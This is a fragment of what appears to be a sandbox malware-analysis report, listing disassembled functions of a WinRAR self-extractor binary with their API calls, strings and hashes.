                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3963884845-3916222277
                                                                                  • Opcode ID: 998ec32a5e386615b93d6f4244c34cdf95a11c1f1b85263ae2f4bdb4c5e46d64
                                                                                  • Instruction ID: 9868739e28bef30231c1be6cae71f5b78048776ea8f5e7649061fa3df6c70597
                                                                                  • Opcode Fuzzy Hash: 998ec32a5e386615b93d6f4244c34cdf95a11c1f1b85263ae2f4bdb4c5e46d64
                                                                                  • Instruction Fuzzy Hash: C611E471E00218AACB14EFA9DA816DEB7B5FF44344F10406BE914E7241D6BC5B918B98
                                                                                  APIs
                                                                                  • EndDialog.USER32(?,00000001), ref: 0040D36E
                                                                                  • GetDlgItemTextW.USER32(?,00000065,?,00000080), ref: 0040D386
                                                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0040D3B4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemText$Dialog
                                                                                  • String ID: GETPASSWORD1
                                                                                  • API String ID: 1770891597-3292211884
                                                                                  • Opcode ID: 20e2f1ddc2ef6257760d1ba2491fb38f136181ff332860c78de716e12c93cd10
                                                                                  • Instruction ID: 2a770bd969fb2baa3b8105a971bde4933cdc7b5be713713aac62907d5d6dcd4b
                                                                                  • Opcode Fuzzy Hash: 20e2f1ddc2ef6257760d1ba2491fb38f136181ff332860c78de716e12c93cd10
                                                                                  • Instruction Fuzzy Hash: 90118232A00118A7DB219FA19C09FFF3A6DEF49754F404036FE45B61C0D678896696AA
                                                                                  APIs
                                                                                  • InitializeCriticalSection.KERNEL32(000001A0,?,0044E590,?,00410E85,00000020,?,00409821,?,?,?,0040BA2E,?,?,00000000,?), ref: 00410D2E
                                                                                  • CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,00409821,?,?,?,0040BA2E,?,?,00000000,?,?,0041225E), ref: 00410D38
                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,00409821,?,?,?,0040BA2E,?,?,00000000,?,?,0041225E), ref: 00410D4A
                                                                                  Strings
                                                                                  • Thread pool initialization failed., xrefs: 00410D62
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                  • String ID: Thread pool initialization failed.
                                                                                  • API String ID: 3340455307-2182114853
                                                                                  • Opcode ID: ac40f6525d483723daf1a6bb0360d02b98909488f345eda45118b6fe413c7db8
                                                                                  • Instruction ID: 3831822a01a909cb0c442bf49b56b14b4ba0a41f1b1af5e4292efc31b2b47fd2
                                                                                  • Opcode Fuzzy Hash: ac40f6525d483723daf1a6bb0360d02b98909488f345eda45118b6fe413c7db8
                                                                                  • Instruction Fuzzy Hash: B9112AB1600710AFD3305FA5A885BE7BBE8EB55355F60482EE6DA86241D6B828D0CB14
                                                                                  APIs
                                                                                    • Part of subcall function 0040D8FF: _wcscpy.LIBCMT ref: 0040D904
                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\WinRAR SFX,00000000,00000001,?,?), ref: 0040DA01
                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0040DA2E
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040DA67
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue_wcscpy
                                                                                  • String ID: Software\WinRAR SFX
                                                                                  • API String ID: 2005349754-754673328
                                                                                  • Opcode ID: 16ee73aa1ccdb387a43e19c670acc848210dbdabe20da61b4f0a43b3b1cb1cfe
                                                                                  • Instruction ID: 299795ea68faa4c574b81033cb9cdb2eb28d5543db85a4fafce3c64357ef6920
                                                                                  • Opcode Fuzzy Hash: 16ee73aa1ccdb387a43e19c670acc848210dbdabe20da61b4f0a43b3b1cb1cfe
                                                                                  • Instruction Fuzzy Hash: 9D113A35A00208EBEF219FA1DD44FDD7B78EB04344F4040A6B904A2190D6749A95DB69
                                                                                  APIs
                                                                                  • SHGetMalloc.SHELL32(?), ref: 004050ED
                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00405128
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: BrowseFolderMalloc
                                                                                  • String ID: A
                                                                                  • API String ID: 3812826013-3554254475
                                                                                  • Opcode ID: 2369a54d27e4e4691d9f9798ac45772536703bb9b1ea954af0e679125d43b3bb
                                                                                  • Instruction ID: b708c960d31f11428b04183cc59b35204deedca2250ff978b2db94b38b52d361
                                                                                  • Opcode Fuzzy Hash: 2369a54d27e4e4691d9f9798ac45772536703bb9b1ea954af0e679125d43b3bb
                                                                                  • Instruction Fuzzy Hash: F8012372900219EBCB10CFA4D809BEF7BF8EF49311F2041A6E805A6240D7388A058FA5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                  • API String ID: 0-56093855
                                                                                  • Opcode ID: 0fad6ce56f2de7d3376022315dec326d7fcf2b5a0991145b78f940dc76bdd9e5
                                                                                  • Instruction ID: ab74704cbbb8baf2ad3952107d87f02ab575f0d4d1926936fa7ef8990c04433a
                                                                                  • Opcode Fuzzy Hash: 0fad6ce56f2de7d3376022315dec326d7fcf2b5a0991145b78f940dc76bdd9e5
                                                                                  • Instruction Fuzzy Hash: 7101B535615214BFC701EB55FE40A167BD5E789358F140C3BF601A22A0E2368835DFAE
                                                                                  APIs
                                                                                  • ___BuildCatchObject.LIBCMT ref: 0041DEF5
                                                                                    • Part of subcall function 0041DE50: ___BuildCatchObjectHelper.LIBCMT ref: 0041DE86
                                                                                  • _UnwindNestedFrames.LIBCMT ref: 0041DF0C
                                                                                  • ___FrameUnwindToState.LIBCMT ref: 0041DF1A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                  • String ID: csm
                                                                                  • API String ID: 2163707966-1018135373
                                                                                  • Opcode ID: da80a6d951740ae99da5115fd17c8ff422e8875fd643a6a7434c62be7bb70cd0
                                                                                  • Instruction ID: bbd11558e6a5c6f91b6ea39c8288bc8ddcb8bca3f7f602b2b51e878f0fdf9860
                                                                                  • Opcode Fuzzy Hash: da80a6d951740ae99da5115fd17c8ff422e8875fd643a6a7434c62be7bb70cd0
                                                                                  • Instruction Fuzzy Hash: A30146B1800209BBCF12AF52CC41EEB3F6AEF08344F004016FD1815161D73AD9B2EBA8
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040BFB7
                                                                                  • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 0040BFC6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindHandleModuleResource
                                                                                  • String ID: LTR$RTL
                                                                                  • API String ID: 3537982541-719208805
                                                                                  • Opcode ID: 4e6b068edd868967d6180040b6ed26316e81829012ad96dfd4a263fa787e6937
                                                                                  • Instruction ID: 5a4550940e43178cae73f81ae7c2dd1265457720ddde325ad6ed990b3a259bec
                                                                                  • Opcode Fuzzy Hash: 4e6b068edd868967d6180040b6ed26316e81829012ad96dfd4a263fa787e6937
                                                                                  • Instruction Fuzzy Hash: 9FF0242134022077D62067B56C0AFE72B6CEB41314F10007AB605E60C0DFA8D49A8BEE
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,0041D610), ref: 00423218
                                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00423228
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                  • API String ID: 1646373207-3105848591
                                                                                  • Opcode ID: d1a69543e5d9c137391ec359d69e443d87eeccf18cec78cee5d5aadc997909ac
                                                                                  • Instruction ID: 3c98e9928195b457dec1495e07e2bf6944307f67708ad0ac31448c6a985ad81a
                                                                                  • Opcode Fuzzy Hash: d1a69543e5d9c137391ec359d69e443d87eeccf18cec78cee5d5aadc997909ac
                                                                                  • Instruction Fuzzy Hash: FBF06D30B00A1AE2DF101FA1BC0A66FBB74FB80742FD20091D6D2B0094CF3881B1829A
                                                                                  APIs
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004197E2
                                                                                  • RegisterClassExW.USER32(00000030), ref: 00419803
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassCursorLoadRegister
                                                                                  • String ID: 0$RarHtmlClassName
                                                                                  • API String ID: 1693014935-3342523147
                                                                                  • Opcode ID: af3eaafe2746200d7010029f25febe6697ea9bf4d54c467e941758c616e3bb28
                                                                                  • Instruction ID: ce230cc3275f868db8caccb84d2986fa2ce8d0dd58158da22838b3632dfa4e97
                                                                                  • Opcode Fuzzy Hash: af3eaafe2746200d7010029f25febe6697ea9bf4d54c467e941758c616e3bb28
                                                                                  • Instruction Fuzzy Hash: 7CF0C9B1D11218EBDB019F99D944ADEFBF8FF58704F10805BE510B7250D7B516058FA9
                                                                                  APIs
                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0040D4C0
                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxpar,00000002,00000000,00000000,?,?,00000400), ref: 0040D4F3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentVariable
                                                                                  • String ID: sfxcmd$sfxpar
                                                                                  • API String ID: 1431749950-3493335439
                                                                                  • Opcode ID: a8140f58090634511f44161ca886cab68263d6ea0c61b5af6c353b9493b3caa2
                                                                                  • Instruction ID: 8d89ab96a1e125908346198fed3aeda265900fda955490a9a690e3b5c2127d3d
                                                                                  • Opcode Fuzzy Hash: a8140f58090634511f44161ca886cab68263d6ea0c61b5af6c353b9493b3caa2
                                                                                  • Instruction Fuzzy Hash: DBE0EC7650011836CA102695DD01FA67B6CEF80784F104037FE41A6091D978A8968BE9
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(kernel32,0040FD0B,00000001), ref: 00410BED
                                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00410BFD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: SetDllDirectoryW$kernel32
                                                                                  • API String ID: 1646373207-2052158636
                                                                                  • Opcode ID: 9877b7f07c448c74edacd698665b6da4c9425930a3fdfe75b90a4a82f5660a07
                                                                                  • Instruction ID: 59ca9bbb54ad1dc253c25414b0a5b463fc1b68461d4099d311e843f210457434
                                                                                  • Opcode Fuzzy Hash: 9877b7f07c448c74edacd698665b6da4c9425930a3fdfe75b90a4a82f5660a07
                                                                                  • Instruction Fuzzy Hash: B0D0A7B03002219B4B1C0F726D19F6726588B40F45754423F7E06D1080DF7CC0B0A52F
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,?,?,0040747C,?,?,?), ref: 004090ED
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,0040747C,?,?,?,?), ref: 00409124
                                                                                  • SetFileTime.KERNEL32(?,00000000,00000000,00000000,?,0040747C,?,?,?,?), ref: 00409195
                                                                                  • CloseHandle.KERNEL32(?,?,0040747C,?,?,?,?), ref: 0040919E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Create$CloseHandleTime
                                                                                  • String ID:
                                                                                  • API String ID: 2287278272-0
                                                                                  • Opcode ID: 6746ec83112f8ef3806bdff4ad86524e3acb39efa96188061f3d4a87c73603e7
                                                                                  • Instruction ID: f35a5a3ed0d1054a0b459a2bb0eb3064bacac3bd9b34612e11fda0545b4c1239
                                                                                  • Opcode Fuzzy Hash: 6746ec83112f8ef3806bdff4ad86524e3acb39efa96188061f3d4a87c73603e7
                                                                                  • Instruction Fuzzy Hash: 0041BF30A00149AEEF11DBA4CC49FEE7BB9AF05314F0440AAF451BB2D2C7799E85CB58
                                                                                  APIs
                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00424DB2
                                                                                  • __isleadbyte_l.LIBCMT ref: 00424DE6
                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,0041A72A,?,00000000,00000000,?,?,?,?,0041A72A,00000000,?), ref: 00424E17
                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,0041A72A,00000001,00000000,00000000,?,?,?,?,0041A72A,00000000,?), ref: 00424E85
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                  • String ID:
                                                                                  • API String ID: 3058430110-0
                                                                                  • Opcode ID: 81987982e1df4478a7ec8bedb2574ddd47b8dcc3746f19ef86f9e98bcee9ea73
                                                                                  • Instruction ID: 34d96542b4f2f6430d40b5dcf61543c795873935e1d33559ae6edcb8347980b7
                                                                                  • Opcode Fuzzy Hash: 81987982e1df4478a7ec8bedb2574ddd47b8dcc3746f19ef86f9e98bcee9ea73
                                                                                  • Instruction Fuzzy Hash: CD310E31B10265EFDB20DF64E8809BE3BA0FF81310F9585AAE4618B2D0D334CD40CB59
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$H_prolog_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1600808285-0
                                                                                  • Opcode ID: 53866512d70242172bba666a9b8fd675876a63121414b9353fe8f0c4afc2a0ae
                                                                                  • Instruction ID: 8707dbc3ea1c7a206fd2168aec13b39480974cebc03b1d47dee04c1bc00d07d0
                                                                                  • Opcode Fuzzy Hash: 53866512d70242172bba666a9b8fd675876a63121414b9353fe8f0c4afc2a0ae
                                                                                  • Instruction Fuzzy Hash: 6931A2B1E04216ABDB14DF69C8457EB76B8EB14319F10053FE105E7282E778AE80C6AC
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID:
                                                                                  • API String ID: 2102423945-0
                                                                                  • Opcode ID: 9d5df03678e0c5d5763a2dcc2e55ed97e5158c9e5106f151ba223aa709053554
                                                                                  • Instruction ID: 1f3416726208f78ed5918f79fcdb11784f1958436039aa26d1951b0feda88d58
                                                                                  • Opcode Fuzzy Hash: 9d5df03678e0c5d5763a2dcc2e55ed97e5158c9e5106f151ba223aa709053554
                                                                                  • Instruction Fuzzy Hash: D5116B71A4878069E221D67A8C45FE3F6DCAB29308F444C2FB3DECB182E5AA74548757
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
